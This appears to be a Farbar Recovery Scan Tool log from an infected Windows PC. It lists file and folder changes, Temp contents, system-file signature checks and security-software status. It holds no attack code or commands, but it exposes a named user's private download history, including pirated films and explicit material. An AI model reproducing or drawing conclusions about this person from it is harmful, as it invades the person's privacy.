2014-08-21 12:36 - 2014-08-21 12:38 - 00000000 ____D () C:\Program Files (x86)\Trojan Remover
2014-08-21 12:36 - 2014-08-21 12:36 - 00000000 ____D () C:\ProgramData\Simply Super Software
2014-08-21 12:33 - 2014-08-21 12:33 - 21657592 _____ (Simply Super Software ) C:\Users\Stephen\Downloads\trjsetup.exe
2014-08-21 11:48 - 2014-08-23 13:00 - 00000840 _____ () C:\windows\Tasks\Security Center Update - 436866125.job
2014-08-21 11:48 - 2014-08-21 11:48 - 00003816 _____ () C:\windows\System32\Tasks\Security Center Update - 436866125
2014-08-20 22:58 - 2014-08-20 22:59 - 30517960 _____ (Microsoft Corporation) C:\Users\Stephen\Downloads\Windows-KB890830-x64-V5.15.exe
2014-08-20 16:22 - 2014-08-23 13:00 - 00000842 _____ () C:\windows\Tasks\Security Center Update - 406261607.job
2014-08-20 16:22 - 2014-08-20 16:22 - 00003818 _____ () C:\windows\System32\Tasks\Security Center Update - 406261607
2014-08-20 16:18 - 2014-08-21 11:46 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-08-20 16:12 - 2014-08-20 16:12 - 00015817 _____ () C:\Users\Stephen\Downloads\122GRJ605.torrent
2014-08-17 23:31 - 2014-08-17 23:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-17 23:30 - 2014-08-17 23:31 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-08-17 23:30 - 2014-08-17 23:31 - 00000000 ____D () C:\Program Files\iTunes
2014-08-17 23:30 - 2014-08-17 23:31 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-08-17 23:30 - 2014-08-17 23:30 - 00000000 ____D () C:\Program Files\iPod
2014-08-14 14:56 - 2014-08-14 14:56 - 00007488 _____ () C:\Users\Stephen\Downloads\English - Al Bhed Translator with Phonetics.htm
2014-08-12 21:43 - 2014-08-12 21:43 - 22726310 _____ () C:\Users\Stephen\Downloads\ROBO BLAST.mp4
2014-08-11 20:31 - 2014-08-11 20:34 - 00000000 ____D () C:\Users\Stephen\Downloads\Hook (1991) [1080p]
2014-08-11 20:31 - 2014-08-11 20:31 - 00000000 ____D () C:\Users\Stephen\Downloads\Hook.1991.720p.BRRip.x264.AC3-REKD
2014-08-11 20:09 - 2014-08-11 21:06 - 00000000 ____D () C:\Users\Stephen\Downloads\Death.To.Smoochy.2002.720p.HDTV.x264.AC3-REKD
2014-08-11 20:08 - 2014-08-12 00:35 - 00000000 ____D () C:\Users\Stephen\Downloads\Super Mario Brothers [1993]-XviD -DVDRip-KaOsUSC (Kingdom-Release)
2014-08-11 19:58 - 2014-08-11 19:58 - 00019985 _____ () C:\Users\Stephen\Downloads\Super_Mario_Brothers_Movie_x-demonoid.ph-x_8656776.1006.torrent
2014-08-10 11:23 - 2014-08-10 11:29 - 37064000 _____ () C:\Users\Stephen\Downloads\rpgtoolkit321.zip
2014-08-08 09:29 - 2014-08-08 09:29 - 01171603 _____ () C:\Users\Stephen\Downloads\33a73e2c6cbb33d7839bbadf9e93bde9.swf
2014-07-31 20:05 - 2014-07-31 20:08 - 00000000 ____D () C:\Users\Stephen\Downloads\[RaianOnzika] Oneirology Experiment Part 1
2014-07-31 19:54 - 2014-07-31 19:56 - 11650569 _____ () C:\Users\Stephen\Downloads\[RaianOnzika] Oneirology Experiment Part 1.zip
2014-07-31 19:54 - 2014-07-31 19:55 - 36218284 _____ () C:\Users\Stephen\Downloads\[Otakon] The Punishment (Sonic The Hedgehog) [English] [Ongoing].zip
2014-07-31 19:51 - 2014-07-31 19:52 - 19861019 _____ () C:\Users\Stephen\Downloads\[Kadath] Misplaced Virtues (Part 2) (High-Rez).zip
2014-07-31 19:51 - 2014-07-31 19:52 - 14073193 _____ () C:\Users\Stephen\Downloads\[Kadath] Misplaced Virtues (Part 3) (Hi-Rez).zip
2014-07-31 19:51 - 2014-07-31 19:51 - 14315500 _____ () C:\Users\Stephen\Downloads\[Kadath] Misplaced Virtues (Prologue + Part 1) (High-Rez).zip
2014-07-31 19:44 - 2014-07-31 19:56 - 03573595 _____ () C:\Users\Stephen\Downloads\[Jay Naylor] Haukaiu The Hero - Chapter #2_ Haukaiu and the Elves.zip
2014-07-31 19:43 - 2014-07-31 19:43 - 14187735 _____ () C:\Users\Stephen\Downloads\(Nancini ) Nina Beginnings and Submissions.zip
2014-07-31 19:40 - 2014-07-31 19:49 - 15098650 _____ () C:\Users\Stephen\Downloads\[Kadath] Night Moves.zip
2014-07-31 19:39 - 2014-07-31 19:41 - 40260579 _____ () C:\Users\Stephen\Downloads\(drawingpalace) CHERNOBOG - The Ballerina.zip
2014-07-31 19:37 - 2014-08-11 21:08 - 28775065 _____ () C:\Users\Stephen\Downloads\[Palcomix] Reform School Whores!.zip
2014-07-31 19:37 - 2014-08-01 02:24 - 00000000 ____D () C:\Users\Stephen\Downloads\[Palcomix] Ninjas, Ninjas, Ninjas
2014-07-31 19:36 - 2014-07-31 19:36 - 00000000 ____D () C:\Users\Stephen\Downloads\Misato's New Girlfriend
2014-07-31 19:34 - 2014-07-31 19:43 - 47730117 _____ () C:\Users\Stephen\Downloads\(Palcomix) Girls Night Out and the Boy's Torment (Ongoing).zip
2014-07-31 19:24 - 2014-07-31 19:37 - 16651470 _____ () C:\Users\Stephen\Downloads\[Palcomix] Rouge's Toys 2 (Sonic The Hedgehog) [Ongoing].zip
2014-07-31 19:07 - 2014-07-31 19:07 - 00018654 _____ () C:\Users\Stephen\Downloads\Stephen Butler - Rogues of Rhea - Diagnosis w Comments.odt
2014-07-31 10:26 - 2014-07-31 10:26 - 00001546 _____ () C:\Users\Stephen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Notepad.lnk
2014-07-30 16:45 - 2014-07-30 16:46 - 19727637 _____ () C:\Users\Stephen\Downloads\Dr Sparky teaches tiny spinner ebony Lucky a lesson with his uv wand.flv
2014-07-30 15:29 - 2014-07-30 15:29 - 00050379 _____ () C:\Users\Stephen\Downloads\spanking_teasing_ebony_xlx.html
2014-07-30 09:50 - 2014-07-30 09:50 - 00001582 _____ () C:\Users\Stephen\Documents\Untitled 1.odt
2014-07-29 18:34 - 2014-07-29 18:34 - 00092536 _____ (System Applet ) C:\Users\Stephen\Downloads\Player-Chrome (3).exe
2014-07-29 18:34 - 2014-07-29 18:34 - 00092536 _____ (System Applet ) C:\Users\Stephen\Downloads\Player-Chrome (2).exe
2014-07-27 22:16 - 2014-07-27 22:17 - 00038967 _____ () C:\Users\Stephen\Downloads\download (1).jpe
2014-07-26 01:21 - 2014-07-26 01:21 - 03106923 _____ () C:\Users\Stephen\Downloads\1406174205207.webm
2014-07-25 18:19 - 2014-07-25 18:19 - 01839677 _____ () C:\Users\Stephen\Downloads\ERC(v0.2.6).zip
2014-07-25 16:55 - 2014-07-25 16:55 - 00000000 ____D () C:\Users\Stephen\Downloads\Crash Course Kit
2014-07-25 16:54 - 2014-07-25 16:54 - 00115885 _____ () C:\Users\Stephen\Downloads\Crash Course Kit.zip
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-23 13:41 - 2014-08-23 13:40 - 00025551 _____ () C:\Users\Stephen\Desktop\FRST.txt
2014-08-23 13:40 - 2014-08-23 13:39 - 00000000 ____D () C:\FRST
2014-08-23 13:40 - 2012-10-29 00:44 - 01532442 _____ () C:\windows\WindowsUpdate.log
2014-08-23 13:40 - 2012-07-26 03:59 - 00000000 ____D () C:\windows\CbsTemp
2014-08-23 13:39 - 2014-08-23 13:39 - 02103296 _____ (Farbar) C:\Users\Stephen\Downloads\FRST64.exe
2014-08-23 13:35 - 2012-10-29 01:31 - 00000000 ____D () C:\ProgramData\WinClon
2014-08-23 13:34 - 2013-01-06 17:55 - 00000000 ____D () C:\Users\Stephen\AppData\Local\CrashDumps
2014-08-23 13:34 - 2012-07-26 03:28 - 00848230 _____ () C:\windows\system32\PerfStringBackup.INI
2014-08-23 13:30 - 2012-12-27 19:35 - 00000918 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-08-23 13:27 - 2014-08-23 13:26 - 00290576 _____ () C:\windows\Minidump\082314-36093-01.dmp
2014-08-23 13:27 - 2013-06-16 21:07 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job
2014-08-23 13:27 - 2012-12-27 19:08 - 00000000 ____D () C:\Users\Stephen
2014-08-23 13:27 - 2012-07-26 03:22 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-08-23 13:26 - 2014-08-22 12:39 - 580607022 _____ () C:\windows\MEMORY.DMP
2014-08-23 13:26 - 2013-01-29 19:53 - 00000000 ____D () C:\windows\Minidump
2014-08-23 13:25 - 2014-08-23 13:25 - 00002560 _____ () C:\Users\Stephen\AppData\Local\A09170451A.exe
2014-08-23 13:25 - 2012-12-27 19:35 - 00000922 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-08-23 13:24 - 2014-08-23 13:24 - 02103296 _____ (Farbar) C:\Users\Stephen\Desktop\FRST64.exe
2014-08-23 13:24 - 2012-10-29 01:39 - 00000360 _____ () C:\windows\Tasks\Xerox PhotoCafe Communicator.job
2014-08-23 13:02 - 2012-07-26 04:12 - 00000000 ____D () C:\windows\system32\sru
2014-08-23 13:00 - 2014-08-21 11:48 - 00000840 _____ () C:\windows\Tasks\Security Center Update - 436866125.job
2014-08-23 13:00 - 2014-08-20 16:22 - 00000842 _____ () C:\windows\Tasks\Security Center Update - 406261607.job
2014-08-23 12:58 - 2014-08-23 12:58 - 00005244 _____ () C:\Users\Stephen\Desktop\attach.txt
2014-08-23 12:57 - 2014-08-23 12:58 - 00015909 _____ () C:\Users\Stephen\Desktop\dds.txt
2014-08-23 12:38 - 2014-08-23 12:38 - 00000000 ___SH () C:\DkHyperbootSync
2014-08-23 12:31 - 2014-08-23 12:29 - 00688992 ____R (Swearware) C:\Users\Stephen\Downloads\dds (1).com
2014-08-23 12:31 - 2014-08-23 12:29 - 00688992 _____ (Swearware) C:\Users\Stephen\Downloads\dds.com
2014-08-23 12:09 - 2012-12-27 20:50 - 00000000 ___RD () C:\Users\Stephen\Dropbox
2014-08-23 12:09 - 2012-12-27 20:46 - 00000000 ____D () C:\Users\Stephen\AppData\Roaming\Dropbox
2014-08-23 12:06 - 2012-07-26 01:37 - 00000000 ____D () C:\windows\servicing
2014-08-23 11:17 - 2014-08-23 11:17 - 00430728 _____ () C:\windows\system32\FNTCACHE.DAT
2014-08-23 11:13 - 2012-07-26 04:12 - 00000000 ___RD () C:\windows\ToastData
2014-08-23 11:13 - 2012-07-26 04:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2014-08-23 11:13 - 2012-07-26 04:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2014-08-23 11:13 - 2012-07-26 04:12 - 00000000 ____D () C:\windows\WinStore
2014-08-23 11:13 - 2012-07-26 04:12 - 00000000 ____D () C:\Program Files\Windows Photo Viewer
2014-08-23 11:13 - 2012-07-26 04:12 - 00000000 ____D () C:\Program Files (x86)\Windows Photo Viewer
2014-08-23 11:13 - 2012-07-26 01:38 - 00000000 ____D () C:\windows\SysWOW64\Dism
2014-08-23 11:13 - 2012-07-26 01:38 - 00000000 ____D () C:\windows\system32\oobe
2014-08-23 11:13 - 2012-07-26 01:38 - 00000000 ____D () C:\windows\system32\Dism
2014-08-23 11:12 - 2012-07-26 04:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2014-08-23 11:12 - 2012-07-26 04:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2014-08-23 11:12 - 2012-07-26 04:12 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2014-08-23 11:12 - 2012-07-26 04:12 - 00000000 ____D () C:\windows\system32\SecureBootUpdates
2014-08-23 11:12 - 2012-07-26 04:12 - 00000000 ____D () C:\windows\PolicyDefinitions
2014-08-23 11:12 - 2012-07-26 04:12 - 00000000 ____D () C:\Program Files\Windows Defender
2014-08-23 11:12 - 2012-07-26 04:12 - 00000000 ____D () C:\Program Files (x86)\Windows Defender
2014-08-23 11:12 - 2012-07-26 03:52 - 00000000 ____D () C:\Program Files\Windows Journal
2014-08-23 10:30 - 2012-07-26 01:26 - 00262144 ___SH () C:\windows\system32\config\BBI
2014-08-23 09:46 - 2013-03-01 00:02 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-08-23 09:11 - 2012-10-29 00:41 - 00000000 ____D () C:\ProgramData\Intel
2014-08-23 09:09 - 2012-10-29 01:45 - 00000000 ____D () C:\Users\EasySurvey
2014-08-23 09:08 - 2014-08-23 09:08 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel PROSet Wireless
2014-08-23 09:08 - 2014-08-23 09:08 - 00000000 ____D () C:\Program Files (x86)\Cisco
2014-08-23 09:08 - 2014-08-23 09:07 - 00000000 ____D () C:\ProgramData\Intel.sav
2014-08-23 09:08 - 2012-10-29 00:41 - 00000000 ____D () C:\Program Files\Common Files\Intel
2014-08-23 09:08 - 2012-10-29 00:41 - 00000000 ____D () C:\Program Files (x86)\Intel
2014-08-23 09:07 - 2012-10-29 00:41 - 00000000 ____D () C:\Program Files\Intel
2014-08-23 09:05 - 2013-06-23 13:46 - 00000000 ____D () C:\ProgramData\Package Cache
2014-08-23 09:00 - 2012-10-29 01:24 - 00000000 ____D () C:\Intel
2014-08-22 22:46 - 2012-07-26 01:26 - 00262144 ___SH () C:\windows\system32\config\ELAM
2014-08-22 14:40 - 2014-08-22 14:40 - 00007605 _____ () C:\Users\Stephen\AppData\Local\Resmon.ResmonCfg
2014-08-22 13:17 - 2012-12-27 19:09 - 00056688 _____ () C:\Users\Stephen\AppData\Roaming\AbsoluteReminder.xml
2014-08-22 12:40 - 2014-08-22 12:39 - 00286552 _____ () C:\windows\Minidump\082214-25421-01.dmp
2014-08-22 12:38 - 2014-08-22 12:38 - 00002560 _____ () C:\Users\Stephen\AppData\Local\53534DF0.exe
2014-08-22 09:01 - 2014-08-22 09:01 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-08-22 08:53 - 2014-08-22 08:53 - 02347384 _____ (ESET) C:\Users\Stephen\Desktop\esetsmartinstaller_enu.exe
2014-08-22 04:27 - 2014-08-22 04:00 - 00002146 _____ () C:\Users\Stephen\Desktop\Rkill.txt
2014-08-22 04:00 - 2014-08-22 04:00 - 01063160 _____ (Bleeping Computer, LLC) C:\Users\Stephen\Downloads\rkill64-2137.exe
2014-08-22 03:53 - 2014-08-22 03:51 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\Stephen\Downloads\rkill.exe
2014-08-22 02:59 - 2014-08-22 02:58 - 00000000 ____D () C:\Users\Stephen\Desktop\New folder (4)
2014-08-22 02:58 - 2014-08-22 02:58 - 00000000 ____D () C:\Users\Stephen\Documents\New folder (3)
2014-08-22 02:58 - 2014-08-22 02:58 - 00000000 ____D () C:\Users\Stephen\Documents\New folder (2)
2014-08-22 02:58 - 2014-08-22 02:58 - 00000000 ____D () C:\Users\Stephen\Documents\New folder
2014-08-22 01:35 - 2014-08-22 01:34 - 00910000 _____ () C:\Users\Stephen\Downloads\MicrosoftSystemScan_db9dee88-9091-4047-a2a0-bf19e4fd7a5d.exe
2014-08-21 19:00 - 2014-08-21 19:00 - 00002776 _____ () C:\windows\System32\Tasks\CCleanerSkipUAC
2014-08-21 19:00 - 2014-08-21 19:00 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-08-21 19:00 - 2014-08-21 18:59 - 00000000 ____D () C:\Program Files\CCleaner
2014-08-21 18:41 - 2014-08-21 18:40 - 04813544 _____ (Piriform Ltd) C:\Users\Stephen\Downloads\ccsetup416.exe
2014-08-21 17:32 - 2014-03-17 21:54 - 00000000 ____D () C:\Users\Stephen\AppData\Roaming\Skype
2014-08-21 17:28 - 2014-08-21 16:01 - 00000000 ____D () C:\Users\Stephen\AppData\Local\NPE
2014-08-21 17:23 - 2014-06-16 19:38 - 00000000 ____D () C:\Users\Stephen\AppData\Local\Web Technology
2014-08-21 16:10 - 2014-08-21 16:08 - 00000000 ____D () C:\NPE
2014-08-21 16:02 - 2012-10-29 01:37 - 00000000 ____D () C:\ProgramData\Norton
2014-08-21 16:01 - 2014-08-21 15:58 - 03077584 ____N (Symantec Corporation) C:\Users\Stephen\Downloads\npe.exe
2014-08-21 13:06 - 2014-08-21 13:06 - 00000000 _____ () C:\Users\Stephen\Downloads\FixNecurs64bit.log
2014-08-21 13:05 - 2014-08-21 13:04 - 05818744 _____ (Symantec Corporation) C:\Users\Stephen\Downloads\FixNecurs64bit.exe
2014-08-21 13:03 - 2014-08-21 13:03 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\Stephen\Downloads\tdsskiller.exe
2014-08-21 13:02 - 2014-08-21 13:02 - 00277328 _____ (ESET) C:\Users\Stephen\Downloads\ESETZBotZRCleaner.exe
2014-08-21 12:40 - 2014-08-21 12:40 - 00000000 ____D () C:\Users\Stephen\Documents\Simply Super Software
2014-08-21 12:40 - 2014-08-21 12:40 - 00000000 ____D () C:\ProgramData\Licenses
2014-08-21 12:40 - 2012-10-29 01:28 - 00000000 ____D () C:\ProgramData\Temp
2014-08-21 12:38 - 2014-08-21 12:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Trojan Remover
2014-08-21 12:38 - 2014-08-21 12:36 - 00000000 ____D () C:\Program Files (x86)\Trojan Remover
2014-08-21 12:36 - 2014-08-21 12:36 - 00000000 ____D () C:\ProgramData\Simply Super Software
2014-08-21 12:33 - 2014-08-21 12:33 - 21657592 _____ (Simply Super Software ) C:\Users\Stephen\Downloads\trjsetup.exe
2014-08-21 11:48 - 2014-08-21 11:48 - 00003816 _____ () C:\windows\System32\Tasks\Security Center Update - 436866125
2014-08-21 11:46 - 2014-08-20 16:18 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-08-20 23:43 - 2012-08-05 17:07 - 00029090 _____ () C:\windows\PFRO.log
2014-08-20 23:08 - 2013-03-04 18:31 - 00111616 ___SH () C:\Users\Stephen\Documents\Thumbs.db
2014-08-20 22:59 - 2014-08-20 22:58 - 30517960 _____ (Microsoft Corporation) C:\Users\Stephen\Downloads\Windows-KB890830-x64-V5.15.exe
2014-08-20 22:18 - 2014-03-17 21:53 - 00000000 ____D () C:\ProgramData\Skype
2014-08-20 20:54 - 2013-08-02 23:46 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-08-20 20:54 - 2013-08-02 23:46 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-08-20 20:52 - 2014-04-14 14:00 - 00000000 ____D () C:\Users\Stephen\AppData\Roaming\uTorrent
2014-08-20 16:22 - 2014-08-20 16:22 - 00003818 _____ () C:\windows\System32\Tasks\Security Center Update - 406261607
2014-08-20 16:12 - 2014-08-20 16:12 - 00015817 _____ () C:\Users\Stephen\Downloads\122GRJ605.torrent
2014-08-20 00:52 - 2012-07-26 04:12 - 00000000 ____D () C:\windows\AUInstallAgent
2014-08-19 15:10 - 2013-08-02 23:47 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2014-08-18 12:36 - 2013-03-02 20:53 - 02884096 ___SH () C:\Users\Stephen\Desktop\Thumbs.db
2014-08-17 23:31 - 2014-08-17 23:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-17 23:31 - 2014-08-17 23:30 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-08-17 23:31 - 2014-08-17 23:30 - 00000000 ____D () C:\Program Files\iTunes
2014-08-17 23:31 - 2014-08-17 23:30 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-08-17 23:30 - 2014-08-17 23:30 - 00000000 ____D () C:\Program Files\iPod
2014-08-14 17:29 - 2012-07-26 04:12 - 00000000 ____D () C:\windows\system32\NDF
2014-08-14 15:47 - 2012-12-27 20:47 - 00000000 ____D () C:\Users\Stephen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2014-08-14 14:56 - 2014-08-14 14:56 - 00007488 _____ () C:\Users\Stephen\Downloads\English - Al Bhed Translator with Phonetics.htm
2014-08-14 11:57 - 2013-05-12 18:53 - 18726912 ___SH () C:\Users\Stephen\Downloads\Thumbs.db
2014-08-12 22:15 - 2013-01-08 20:28 - 00000000 ____D () C:\Users\Stephen\AppData\Roaming\vlc
2014-08-12 21:43 - 2014-08-12 21:43 - 22726310 _____ () C:\Users\Stephen\Downloads\ROBO BLAST.mp4
2014-08-12 00:35 - 2014-08-11 20:08 - 00000000 ____D () C:\Users\Stephen\Downloads\Super Mario Brothers [1993]-XviD -DVDRip-KaOsUSC (Kingdom-Release)
2014-08-11 21:08 - 2014-07-31 19:37 - 28775065 _____ () C:\Users\Stephen\Downloads\[Palcomix] Reform School Whores!.zip
2014-08-11 21:06 - 2014-08-11 20:09 - 00000000 ____D () C:\Users\Stephen\Downloads\Death.To.Smoochy.2002.720p.HDTV.x264.AC3-REKD
2014-08-11 20:34 - 2014-08-11 20:31 - 00000000 ____D () C:\Users\Stephen\Downloads\Hook (1991) [1080p]
2014-08-11 20:31 - 2014-08-11 20:31 - 00000000 ____D () C:\Users\Stephen\Downloads\Hook.1991.720p.BRRip.x264.AC3-REKD
2014-08-11 20:31 - 2014-07-21 13:30 - 00000000 ____D () C:\Users\Stephen\Downloads\SaHa
2014-08-11 19:58 - 2014-08-11 19:58 - 00019985 _____ () C:\Users\Stephen\Downloads\Super_Mario_Brothers_Movie_x-demonoid.ph-x_8656776.1006.torrent
2014-08-10 11:29 - 2014-08-10 11:23 - 37064000 _____ () C:\Users\Stephen\Downloads\rpgtoolkit321.zip
2014-08-08 09:29 - 2014-08-08 09:29 - 01171603 _____ () C:\Users\Stephen\Downloads\33a73e2c6cbb33d7839bbadf9e93bde9.swf
2014-08-01 02:24 - 2014-07-31 19:37 - 00000000 ____D () C:\Users\Stephen\Downloads\[Palcomix] Ninjas, Ninjas, Ninjas
2014-07-31 23:41 - 2012-12-29 14:15 - 99218768 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
2014-07-31 20:08 - 2014-07-31 20:05 - 00000000 ____D () C:\Users\Stephen\Downloads\[RaianOnzika] Oneirology Experiment Part 1
2014-07-31 19:56 - 2014-07-31 19:54 - 11650569 _____ () C:\Users\Stephen\Downloads\[RaianOnzika] Oneirology Experiment Part 1.zip
2014-07-31 19:56 - 2014-07-31 19:44 - 03573595 _____ () C:\Users\Stephen\Downloads\[Jay Naylor] Haukaiu The Hero - Chapter #2_ Haukaiu and the Elves.zip
2014-07-31 19:55 - 2014-07-31 19:54 - 36218284 _____ () C:\Users\Stephen\Downloads\[Otakon] The Punishment (Sonic The Hedgehog) [English] [Ongoing].zip
2014-07-31 19:52 - 2014-07-31 19:51 - 19861019 _____ () C:\Users\Stephen\Downloads\[Kadath] Misplaced Virtues (Part 2) (High-Rez).zip
2014-07-31 19:52 - 2014-07-31 19:51 - 14073193 _____ () C:\Users\Stephen\Downloads\[Kadath] Misplaced Virtues (Part 3) (Hi-Rez).zip
2014-07-31 19:51 - 2014-07-31 19:51 - 14315500 _____ () C:\Users\Stephen\Downloads\[Kadath] Misplaced Virtues (Prologue + Part 1) (High-Rez).zip
2014-07-31 19:49 - 2014-07-31 19:40 - 15098650 _____ () C:\Users\Stephen\Downloads\[Kadath] Night Moves.zip
2014-07-31 19:43 - 2014-07-31 19:43 - 14187735 _____ () C:\Users\Stephen\Downloads\(Nancini ) Nina Beginnings and Submissions.zip
2014-07-31 19:43 - 2014-07-31 19:34 - 47730117 _____ () C:\Users\Stephen\Downloads\(Palcomix) Girls Night Out and the Boy's Torment (Ongoing).zip
2014-07-31 19:41 - 2014-07-31 19:39 - 40260579 _____ () C:\Users\Stephen\Downloads\(drawingpalace) CHERNOBOG - The Ballerina.zip
2014-07-31 19:37 - 2014-07-31 19:24 - 16651470 _____ () C:\Users\Stephen\Downloads\[Palcomix] Rouge's Toys 2 (Sonic The Hedgehog) [Ongoing].zip
2014-07-31 19:36 - 2014-07-31 19:36 - 00000000 ____D () C:\Users\Stephen\Downloads\Misato's New Girlfriend
2014-07-31 19:07 - 2014-07-31 19:07 - 00018654 _____ () C:\Users\Stephen\Downloads\Stephen Butler - Rogues of Rhea - Diagnosis w Comments.odt
2014-07-31 10:26 - 2014-07-31 10:26 - 00001546 _____ () C:\Users\Stephen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Notepad.lnk
2014-07-31 01:08 - 2013-01-08 20:28 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2014-07-30 16:46 - 2014-07-30 16:45 - 19727637 _____ () C:\Users\Stephen\Downloads\Dr Sparky teaches tiny spinner ebony Lucky a lesson with his uv wand.flv
2014-07-30 15:29 - 2014-07-30 15:29 - 00050379 _____ () C:\Users\Stephen\Downloads\spanking_teasing_ebony_xlx.html
2014-07-30 09:50 - 2014-07-30 09:50 - 00001582 _____ () C:\Users\Stephen\Documents\Untitled 1.odt
2014-07-29 18:34 - 2014-07-29 18:34 - 00092536 _____ (System Applet ) C:\Users\Stephen\Downloads\Player-Chrome (3).exe
2014-07-29 18:34 - 2014-07-29 18:34 - 00092536 _____ (System Applet ) C:\Users\Stephen\Downloads\Player-Chrome (2).exe
2014-07-27 22:17 - 2014-07-27 22:16 - 00038967 _____ () C:\Users\Stephen\Downloads\download (1).jpe
2014-07-26 01:21 - 2014-07-26 01:21 - 03106923 _____ () C:\Users\Stephen\Downloads\1406174205207.webm
2014-07-25 18:19 - 2014-07-25 18:19 - 01839677 _____ () C:\Users\Stephen\Downloads\ERC(v0.2.6).zip
2014-07-25 16:55 - 2014-07-25 16:55 - 00000000 ____D () C:\Users\Stephen\Downloads\Crash Course Kit
2014-07-25 16:54 - 2014-07-25 16:54 - 00115885 _____ () C:\Users\Stephen\Downloads\Crash Course Kit.zip
2014-07-25 16:51 - 2013-12-11 23:04 - 00000000 ____D () C:\Users\Stephen\AppData\Roaming\Stencyl
2014-07-25 16:50 - 2013-12-11 23:03 - 00000000 ____D () C:\Program Files (x86)\Stencyl
 
Files to move or delete:
====================
C:\ProgramData\MakeMarkerFile.exe
C:\Users\EasySurvey\EasySurvey.exe
 
 
Some content of TEMP:
====================
C:\Users\Stephen\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpzys3gw.dll
C:\Users\Stephen\AppData\Local\Temp\Scrivener-1710-update.exe
C:\Users\Stephen\AppData\Local\Temp\setup.exe
C:\Users\Stephen\AppData\Local\Temp\SPStub.exe
C:\Users\Stephen\AppData\Local\Temp\tbInte.dll
C:\Users\Stephen\AppData\Local\Temp\ToolbarHelper.exe
C:\Users\Stephen\AppData\Local\Temp\UpdateFlashPlayer_ba997d60.exe
C:\Users\Stephen\AppData\Local\Temp\UpdateFlashPlayer_c0bdc4bb.exe
C:\Users\Stephen\AppData\Local\Temp\vlc-2.1.5-win32.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-08-15 10:32
 
==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 23-08-2014
Ran by Stephen at 2014-08-23 13:42:38
Running from C:\Users\Stephen\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Norton Internet Security (Disabled - Out of date) {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
AS: Norton Internet Security (Disabled - Out of date) {631E4324-D31C-783F-EC5C-35AD42B18466}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Norton Internet Security (Disabled) {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
[PS3] Save Resigner (HKLM-x32\...\[PS3] Save Resigner 2.0.2) (Version: 2.0.2 - The Prince of Codes)
[PS3] Save Resigner (x32 Version: 2.0.2 - The Prince of Codes) Hidden
µTorrent (HKCU\...\uTorrent) (Version: 3.4.2.32239 - BitTorrent Inc.)
Absolute Reminder (HKLM-x32\...\{40F4FF7A-B214-4453-B973-080B09CED019}) (Version: 2.1.0.8 - Absolute Software)
Action Replay Code Manager (HKLM-x32\...\Action Replay Code Manager_is1) (Version:  - )
